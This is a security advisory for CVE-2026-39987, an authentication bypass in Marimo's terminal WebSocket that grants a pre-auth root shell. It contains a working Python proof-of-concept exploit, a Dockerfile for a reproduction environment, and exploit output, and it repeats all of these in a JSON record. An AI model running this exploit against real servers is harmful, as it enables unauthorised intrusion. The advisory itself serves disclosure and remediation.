GHSA-2679-6MX9-H9XC

Vulnerability from github – Published: 2026-04-08 21:50 – Updated: 2026-04-09 19:06
VLAI?
Summary
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
Details

Summary

Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.

Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.

Affected Versions

Marimo <= 0.20.4

Vulnerability Details

Root Cause: Terminal WebSocket Missing Authentication

marimo/_server/api/endpoints/terminal.py lines 340-356:

@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    if app_state.mode != SessionMode.EDIT:
        await websocket.close(...)
        return
    if not supports_terminal():
        await websocket.close(...)
        return
    # No authentication check!
    await websocket.accept()  # Accepts connection directly
    # ...
    child_pid, fd = pty.fork()  # Creates PTY shell

Compare with the correctly implemented /ws endpoint (ws_endpoint.py lines 67-82):

@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    validator = WebSocketConnectionValidator(websocket, app_state)
    if not await validator.validate_auth():  # Correct auth check
        return

Authentication Middleware Limitation

Marimo uses Starlette's AuthenticationMiddleware, which marks failed auth connections as UnauthenticatedUser but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level @requires() decorators or validate_auth() calls.

The /terminal/ws endpoint has neither a @requires("edit") decorator nor a validate_auth() call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.

Attack Chain

  1. WebSocket connect to ws://TARGET:2718/terminal/ws (no auth needed)
  2. websocket.accept() accepts the connection directly
  3. pty.fork() creates a PTY child process
  4. Full interactive shell with arbitrary command execution
  5. Commands run as root in default Docker deployments

A single WebSocket connection yields a complete interactive shell.

Proof of Concept

import websocket
import time

# Connect without any authentication
ws = websocket.WebSocket()
ws.connect('ws://TARGET:2718/terminal/ws')
time.sleep(2)

# Drain initial output
try:
    while True:
        ws.settimeout(1)
        ws.recv()
except:
    pass

# Execute arbitrary command
ws.settimeout(10)
ws.send('id\n')
time.sleep(2)
print(ws.recv())  # uid=0(root) gid=0(root) groups=0(root)
ws.close()

Reproduction Environment

FROM python:3.12-slim
RUN pip install --no-cache-dir marimo==0.20.4
RUN mkdir -p /app/notebooks
RUN echo 'import marimo as mo; app = mo.App()' > /app/notebooks/test.py
WORKDIR /app/notebooks
EXPOSE 2718
CMD ["marimo", "edit", "--host", "0.0.0.0", "--port", "2718", "."]

Reproduction Result

With auth enabled (server generates random access_token), the exploit bypasses authentication entirely:

$ python3 exp.py http://127.0.0.1:2718 exec "id && whoami && hostname"
[+] No auth needed! Terminal WebSocket connected
[+] Output:
uid=0(root) gid=0(root) groups=0(root)
root
ddfc452129c3

Suggested Remediation

  1. Add authentication validation to /terminal/ws endpoint, consistent with /ws using WebSocketConnectionValidator.validate_auth()
  2. Apply unified authentication decorators or middleware interception to all WebSocket endpoints
  3. Terminal functionality should only be available when explicitly enabled, not on by default

Impact

An unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.

Severity ?
9.3 (Critical)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "marimo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.23.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39987"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T21:50:58Z",
    "nvd_published_at": "2026-04-09T18:17:02Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nMarimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint `/terminal/ws` lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.\n\nUnlike other WebSocket endpoints (e.g., `/ws`) that correctly call `validate_auth()` for authentication, the `/terminal/ws` endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.\n\n## Affected Versions\n\nMarimo \u003c= 0.20.4 \n\n## Vulnerability Details\n\n### Root Cause: Terminal WebSocket Missing Authentication\n\n`marimo/_server/api/endpoints/terminal.py` lines 340-356:\n\n```python\n@router.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket) -\u003e None:\n    app_state = AppState(websocket)\n    if app_state.mode != SessionMode.EDIT:\n        await websocket.close(...)\n        return\n    if not supports_terminal():\n        await websocket.close(...)\n        return\n    # No authentication check!\n    await websocket.accept()  # Accepts connection directly\n    # ...\n    child_pid, fd = pty.fork()  # Creates PTY shell\n```\n\nCompare with the correctly implemented `/ws` endpoint (`ws_endpoint.py` lines 67-82):\n\n```python\n@router.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket) -\u003e None:\n    app_state = AppState(websocket)\n    validator = WebSocketConnectionValidator(websocket, app_state)\n    if not await validator.validate_auth():  # Correct auth check\n        return\n```\n\n### Authentication Middleware Limitation\n\nMarimo uses Starlette\u0027s `AuthenticationMiddleware`, which marks failed auth connections as `UnauthenticatedUser` but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level `@requires()` decorators or `validate_auth()` calls.\n\nThe `/terminal/ws` endpoint has neither a `@requires(\"edit\")` decorator nor a `validate_auth()` call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.\n\n### Attack Chain\n\n1. WebSocket connect to `ws://TARGET:2718/terminal/ws` (no auth needed)\n2. `websocket.accept()` accepts the connection directly\n3. `pty.fork()` creates a PTY child process\n4. Full interactive shell with arbitrary command execution\n5. Commands run as root in default Docker deployments\n\nA single WebSocket connection yields a complete interactive shell.\n\n## Proof of Concept\n\n```python\nimport websocket\nimport time\n\n# Connect without any authentication\nws = websocket.WebSocket()\nws.connect(\u0027ws://TARGET:2718/terminal/ws\u0027)\ntime.sleep(2)\n\n# Drain initial output\ntry:\n    while True:\n        ws.settimeout(1)\n        ws.recv()\nexcept:\n    pass\n\n# Execute arbitrary command\nws.settimeout(10)\nws.send(\u0027id\\n\u0027)\ntime.sleep(2)\nprint(ws.recv())  # uid=0(root) gid=0(root) groups=0(root)\nws.close()\n```\n\n### Reproduction Environment\n\n```dockerfile\nFROM python:3.12-slim\nRUN pip install --no-cache-dir marimo==0.20.4\nRUN mkdir -p /app/notebooks\nRUN echo \u0027import marimo as mo; app = mo.App()\u0027 \u003e /app/notebooks/test.py\nWORKDIR /app/notebooks\nEXPOSE 2718\nCMD [\"marimo\", \"edit\", \"--host\", \"0.0.0.0\", \"--port\", \"2718\", \".\"]\n```\n\n### Reproduction Result\n\nWith auth enabled (server generates random `access_token`), the exploit bypasses authentication entirely:\n\n```\n$ python3 exp.py http://127.0.0.1:2718 exec \"id \u0026\u0026 whoami \u0026\u0026 hostname\"\n[+] No auth needed! Terminal WebSocket connected\n[+] Output:\nuid=0(root) gid=0(root) groups=0(root)\nroot\nddfc452129c3\n```\n\n## Suggested Remediation\n\n1. Add authentication validation to `/terminal/ws` endpoint, consistent with `/ws` using `WebSocketConnectionValidator.validate_auth()`\n2. Apply unified authentication decorators or middleware interception to all WebSocket endpoints\n3. Terminal functionality should only be available when explicitly enabled, not on by default\n\n## Impact\n\nAn unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.",
  "id": "GHSA-2679-6mx9-h9xc",
  "modified": "2026-04-09T19:06:14Z",
  "published": "2026-04-08T21:50:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39987"
    },
    {
      "type": "WEB",
      "url": "https://github.com/marimo-team/marimo/pull/9098"
    },
    {
      "type": "WEB",
      "url": "https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/marimo-team/marimo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.